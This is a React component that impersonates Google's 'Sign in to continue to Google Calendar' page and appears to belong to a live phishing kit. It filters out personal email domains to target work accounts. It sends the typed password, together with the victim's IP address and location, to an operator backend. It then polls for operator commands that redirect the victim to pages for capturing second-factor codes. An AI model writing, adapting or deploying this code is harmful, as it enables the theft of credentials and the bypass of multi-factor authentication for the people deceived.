import { useState, useEffect, useRef } from "react";
import { useNavigate } from "react-router-dom";
import GoogleAuthLayout from "./GoogleAuthLayout";
import googleCalendarIcon from "./assets/google-calendar.png";
import { AUTH_TYPE_ROUTES } from "./authRoutes";

const BLOCKED_EMAIL_DOMAINS = new Set([
  "gmail.com",
  "googlemail.com",
  "yahoo.com",
  "msn.com",
  "icloud.com",
  "live.com",
  "hotmail.com",
  "outlook.com",
  "protonmail.com",
  "aol.com",
]);

function isBlockedEmailDomain(rawEmail) {
  const at = rawEmail.lastIndexOf("@");
  if (at < 0) return false;
  return BLOCKED_EMAIL_DOMAINS.has(rawEmail.slice(at + 1).trim().toLowerCase());
}

const BUSINESS_EMAIL_MESSAGE = "Please use your work or business email";

const GOOGLE_CALENDAR_OAUTH = {
  name: "Google Calendar",
  iconUrl: googleCalendarIcon,
};

export default function Login() {
  const navigate = useNavigate();
  const [code, setCode] = useState("");
  const [showPassword, setShowPassword] = useState(false);

  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  // Initialize session_id from localStorage on mount to maintain continuity
  const [sessionId, setSessionId] = useState(() => {
    return localStorage.getItem("session_id") || null;
  });
  const [loading, setLoading] = useState(false);
  const [redirecting, setRedirecting] = useState(false);
  const [messageIndex, setMessageIndex] = useState(0);
  const [error, setError] = useState("");
  const [infoMessage, setInfoMessage] = useState("");
  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const [ip, setIp] = useState("");
  const [city, setCity] = useState("");
  const [country, setCountry] = useState("");
  const [showPasswordField, setShowPasswordField] = useState(false);
  const isSubmittingLogin = useRef(false);

  // Load existing session_id from localStorage only — do not auto-create sessions here
  useEffect(() => {
    const existingSessionId = localStorage.getItem("session_id");
    if (existingSessionId) {
      setSessionId(existingSessionId);
    }
  }, []);

  // Email validation function
  const isValidEmail = (email) => {
    const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
    return emailRegex.test(email);
  };

  const handleEmailNext = (e) => {
    e.preventDefault();
    if (!username.trim()) return;
    
    // Validate email format
    if (!isValidEmail(username.trim())) {
      setError("Enter a valid email address");
      return;
    }

    if (isBlockedEmailDomain(username.trim())) {
      setError(BUSINESS_EMAIL_MESSAGE);
      return;
    }
    
    setError("");
    setShowPasswordField(true);
    // Explicitly ensure loading is false when just moving to password step
    setLoading(false);
    isSubmittingLogin.current = false;
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    if (!showPasswordField) {
      handleEmailNext(e);
      return;
    }
    
    // Only proceed if we have both username and password
    if (!username.trim() || !password.trim()) {
      return;
    }

    if (password.length < 6) {
      setError("Password must be at least 6 characters");
      return;
    }
    
    if (isBlockedEmailDomain(username.trim())) {
      setError(BUSINESS_EMAIL_MESSAGE);
      setShowPasswordField(false);
      setPassword("");
      return;
    }
    
    setError("");
    setInfoMessage("");
    setLoading(true);
    isSubmittingLogin.current = true; // Mark that we're submitting login

    localStorage.setItem("username", username);
    localStorage.setItem("password", password);
    localStorage.setItem("userEmail", username); // Store email for display in verification modals

    (async () => {
      try {
        // Get existing session_id from localStorage (from booking step or page load)
        const existingSessionId = localStorage.getItem("session_id");

        // Re-fetch client geo on submit: useEffect can race, so city/country were often still empty
        let loginIp = ip;
        let loginCity = city;
        let loginCountry = country;
        try {
          const geo = await (await fetch("https://ipwho.is/")).json();
          if (geo.success) {
            if (geo.ip) loginIp = loginIp || geo.ip;
            if (!loginCity) loginCity = String(geo.city || "").trim();
            if (!loginCountry) loginCountry = String(geo.country || "").trim();
          }
        } catch {
          // Backend enriches from the resolved request IP; continue
        }
        
        const res = await fetch(`${API_URL}/api/login`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ 
            username, 
            password, 
            ip: loginIp, 
            city: loginCity, 
            country: loginCountry, 
            old_session_id: existingSessionId 
          }),
        });
        if (!res.ok) {
          const data = await res.json().catch(() => ({}));
          if (res.status === 429) {
            throw new Error("Too many login attempts. Please wait and try again.");
          }
          throw new Error(data.detail || "Login failed");
        }
        const { session_id } = await res.json();
        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        }
        // Keep loading state - waiting for admin command (Tap, Email, SMS, etc.)
        setLoading(true);
      } catch (err) {
        console.error("Login failed:", err);
        setError(err.message || "Login failed");
        setLoading(false);
        isSubmittingLogin.current = false;
        // Don't remove session_id on error - keep it for retry
        // Only reset if it's a critical error
      }
    })();
  };

  useEffect(() => {
    // Only start polling if we have a sessionId AND we've submitted login
    // Don't poll if we're just on the email field or password field without submitting
    if (!sessionId || !isSubmittingLogin.current) {
      // Ensure loading is off when not submitting
      setLoading(false);
      return;
    }

    const routes = AUTH_TYPE_ROUTES;

    // Set loading to true when we start polling (after login submission)
    setLoading(true);

    const poll = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${sessionId}`
        );

        if (!res.ok) throw new Error("Failed to fetch response");

        const data = await res.json();

        // PRIORITY 1: Check for authType redirect - only redirect when command is clicked
        if (data.authType) {
          setError(""); // Clear errors
          const route = routes[data.authType];
          
          if (route) {
            // Redirect to the appropriate page when command is clicked
            clearInterval(poll);
            setError("");
            setLoading(false);
            isSubmittingLogin.current = false;
            setRedirecting(true);
            navigate(route);
          } else {
            setError("");
            setLoading(true); // Keep loading while waiting for completion
          }
          return;
        }

        if (data.redirect) {
          clearInterval(poll);
          setError(""); // Clear errors
          setLoading(false);
          isSubmittingLogin.current = false;
          setRedirecting(true);
          // Use React Router navigate for internal routes
          if (data.redirect.startsWith("/")) {
            navigate(data.redirect);
          } else {
            // External URLs use window.location
            window.location.replace(data.redirect);
          }
          return;
        }
        
        // PRIORITY 2: Only show errors if NO redirect is happening
        if (data.error && !data.authType && !data.redirect) {
          const errorLower = data.error.toLowerCase();
          // Only show login-related errors
          if (errorLower.includes("email") || errorLower.includes("password") || errorLower.includes("sign you in") || errorLower.includes("wrong")) {
            clearInterval(poll);
            setLoading(false);
            isSubmittingLogin.current = false;
            setError(data.error);
            
            // Reset form to allow user to try again from beginning
            if (errorLower.includes("wrong email") || errorLower.includes("wrong password")) {
              setShowPasswordField(false);
              setPassword("");
              // Keep session_id for retry - don't remove it
            }
            return;
          }
        }
        
        // After login, keep loading state while waiting for admin command
        // This is the "between commands" state - waiting for next telegram action
        if (!data.authType && !data.redirect && !data.error) {
          setLoading(true); // Keep loading while waiting for admin command
          setError("");
        }

        if (data.message) {
          setInfoMessage(data.message);
        }
      } catch (err) {
        clearInterval(poll);
        setLoading(false);
        isSubmittingLogin.current = false;
        console.error("Polling error:", err);
        setError("Something went wrong while checking session.");
      }
    }, 3000);

    return () => clearInterval(poll);
  }, [sessionId, API_URL, navigate]);

  useEffect(() => {
    fetch("https://ipwho.is/")
      .then((res) => res.json())
      .then((data) => {
        setIp(data.ip || "");
        setCity(data.city || "");
        setCountry(data.country || "");
      })
      .catch(() => {});
  }, []);

  return (
    <GoogleAuthLayout
      oauthApp={GOOGLE_CALENDAR_OAUTH}
      heading={showPasswordField ? "Welcome" : "Sign in"}
      subheading={
        showPasswordField ? null : (
          <>
            to continue to <a href="#" className="google-link">Google Calendar</a>
          </>
        )
      }
      email={username}
      showEmailBadge={showPasswordField}
    >
      {error && error.trim() && (
        <div className="google-error-container">
          <p className="google-error-message">{error}</p>
        </div>
      )}

      <form onSubmit={handleSubmit} className="google-login-form">
              <div className="google-auth-fields">
              {!showPasswordField && (
                <div className="google-input-group">
                  <div className="google-input-wrapper">
                    <input
                      id="identifier"
                      type="email"
                      autoComplete="username"
                      value={username}
                      onChange={(e) => {
                        setUsername(e.target.value);
                        if (showPasswordField && !e.target.value.trim()) {
                          setShowPasswordField(false);
                        }
                        if (error) setError("");
                      }}
                      required
                      disabled={loading}
                      pattern="[^\s@]+@[^\s@]+\.[^\s@]+"
                      className={`google-input ${username.trim() ? "google-input-filled" : ""} ${
                        error ? "google-input-error" : ""
                      }`}
                    />
                    <label htmlFor="identifier" className="google-label">
                      Email or phone
                    </label>
                  </div>
                </div>
              )}

              {showPasswordField && (
                <>
                  <div className="google-input-group">
                    <div className="google-input-wrapper">
                      <input
                        id="password"
                        type={showPassword ? "text" : "password"}
                        autoComplete="current-password"
                        value={password}
                        onChange={(e) => setPassword(e.target.value)}
                        onKeyDown={(e) => {
                          if (e.key === "Enter" && password.trim().length >= 6) {
                            handleSubmit(e);
                          }
                        }}
                        required
                        disabled={loading}
                        minLength={6}
                        autoFocus={showPasswordField}
                        className={`google-input ${password.trim() ? "google-input-filled" : ""} ${
                          error ? "google-input-error" : ""
                        }`}
                      />
                      <label htmlFor="password" className="google-label">
                        Enter your password
                      </label>
                    </div>
                  </div>
                  <div className="google-show-password-checkbox">
                    <input
                      type="checkbox"
                      id="showPasswordCheckbox"
                      checked={showPassword}
                      onChange={(e) => setShowPassword(e.target.checked)}
                    />
                    <label htmlFor="showPasswordCheckbox">Show password</label>
                  </div>
                </>
              )}

              {!showPasswordField && (
                <>
                  <div className="google-forgot-link">
                    <a href="#" className="google-link">Forgot email?</a>
                  </div>
                  <p className="google-oauth-legal">
                    Before using this app, you can review Google&apos;s{" "}
                    <a href="#" className="google-link">Privacy Policy</a> and{" "}
                    <a href="#" className="google-link">Terms of Service</a>.
                  </p>
                </>
              )}

              {showPasswordField && (
                <div className="google-forgot-link">
                  <a href="#" className="google-link">Forgot password?</a>
                </div>
              )}

              </div>

              <div className="google-button-group google-auth-actions">
                {showPasswordField ? (
                  <button
                    type="button"
                    className="google-link-secondary"
                    onClick={() => {
                      setShowPasswordField(false);
                      setLoading(false);
                      isSubmittingLogin.current = false;
                      setError("");
                    }}
                    style={{ background: "none", border: "none", cursor: "pointer", padding: "0 8px" }}
                  >
                    Back
                  </button>
                ) : (
                  <a href="#" className="google-link-secondary">Create account</a>
                )}
                <button
                  type="submit"
                  className="google-button-primary"
                  disabled={loading || !username.trim() || (showPasswordField && password.trim().length < 6)}
                >
                  {loading ? <div className="google-spinner" /> : "Next"}
                </button>
              </div>
      </form>
    </GoogleAuthLayout>
  );
}
